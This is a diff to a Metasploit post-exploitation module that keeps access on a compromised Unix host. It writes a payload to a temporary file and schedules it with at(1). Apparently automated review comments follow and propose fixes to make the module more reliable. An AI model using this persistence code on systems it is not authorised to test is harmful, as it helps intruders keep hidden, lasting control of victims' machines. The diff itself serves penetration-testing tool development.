diff --git a/modules/exploits/multi/local/at_persistence.rb b/modules/exploits/multi/local/at_persistence.rb
index dd41d43369..e7b6d21eaa 100644
--- a/modules/exploits/multi/local/at_persistence.rb
+++ b/modules/exploits/multi/local/at_persistence.rb
@@ -16,6 +16,7 @@ class MetasploitModule < Msf::Exploit::Local
 info,
 'Name' => 'at(1) Persistence',
 'Description' => %q(
+ This module achieves persisience by executing payloads via at(1).
 ),
 'License' => MSF_LICENSE,
 'Author' =>
@@ -42,7 +43,13 @@ class MetasploitModule < Msf::Exploit::Local
 register_options(
 [
 OptString.new('TIME', [false, 'When to run job via at(1). Changing may require WfsDelay to be adjusted', 'now + 1 minute']),
- OptBool.new('CLEANUP', [true, 'Delete at entry and payload after execution', true])
+ OptBool.new('CLEANUP', [true, 'Delete payload after execution', true])
+ ]
+ )
+
+ register_advanced_options(
+ [
+ OptString.new('PATH', [false, 'Path to store payload to be executed by at(1). Leave unset to use mktemp'])
 ]
 )
 end
@@ -56,14 +63,26 @@ class MetasploitModule < Msf::Exploit::Local
 end
 end
+ def cmd_exec(cmd)
+ super("PATH=/bin:/usr/bin:/usr/local/bin #{cmd}")
+ end
+
 def exploit
 unless check == Exploit::CheckCode::Vulnerable
 fail_with(Failure::NoAccess, 'User denied cron via at.deny')
 end
- write_file("/tmp/test.sh", payload.encoded)
- cmd_exec("at -f /tmp/test.sh #{datastore['TIME']}")
+ unless payload_file = datastore['PATH'] || cmd_exec('mktemp')
+ fail_with(Failure::BadConfig, 'Unable to find suitable location for payload')
+ end
+
+ write_file(payload_file, payload.encoded)
+ cmd_exec("at -f #{payload_file} #{datastore['TIME']}")
+ register_files_for_cleanup(payload_file) if datastore['CLEANUP']
 print_status("Waiting #{datastore['WfsDelay']}sec for execution")
- Rex.sleep(datastore['WfsDelay'].to_i)
+ 0.upto(datastore['WfsDelay'].to_i) do
+ Rex.sleep(1)
+ break if session_created?
+ end
 end
 end
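Review bot: The description line added in the first hunk misspells "persistence" as `persisience`, and this string is shown to anyone reading the module's info. The line should read `This module achieves persistence by executing payloads via at(1).` The rest of the info hash lies outside the hunk, so nothing else about it is assessed here.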
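Review bot: The advanced option added in the second hunk is named `PATH`, which reads as the shell search path rather than a file location, and the `cmd_exec` override in the third hunk of this same commit prefixes commands with a `PATH=` environment assignment, so both meanings now appear in one module. A name and help text that say what is stored would avoid the ambiguity, for example `OptString.new('PAYLOAD_PATH', [false, 'File on the target where the payload is written; must be writable by the session user. Leave unset to use mktemp'])`. The option text is also the only documentation of where the file lands, so it is worth stating that the value is used verbatim as the file name.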
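Review bot: The guard `unless payload_file = datastore['PATH'] || cmd_exec('mktemp')` in `exploit` cannot reach its `fail_with` when mktemp fails, because `cmd_exec` presumably returns the command output as a String and every String, including an empty one or an error message, is truthy in Ruby. The module would then go on to `write_file` and `at -f` with a bogus path, so the value should be stripped and validated before use, as in the fence below (which assumes an absolute path is acceptable for the operator-supplied option too). In the same hunk, `payload_file` and `TIME` are interpolated unquoted into the `at -f` command line, so a path with spaces or shell metacharacters changes the command that runs; escaping the path (e.g. `Shellwords.escape`) would keep it to a single argument. Finally, `0.upto(datastore['WfsDelay'].to_i)` iterates WfsDelay + 1 times, so the wait exceeds the configured delay by one second.

```ruby
  def exploit
    # … unchanged: check / at.deny guard …
    payload_file = datastore['PATH'].to_s.strip
    payload_file = cmd_exec('mktemp').to_s.strip if payload_file.empty?
    # mktemp prints a path on success; anything else here is empty or an error message
    unless payload_file.start_with?('/')
      fail_with(Failure::BadConfig, 'Unable to find suitable location for payload')
    end
    # … unchanged: write_file, at -f, register_files_for_cleanup, print_status …
    datastore['WfsDelay'].to_i.times do
      Rex.sleep(1)
      break if session_created?
    end
```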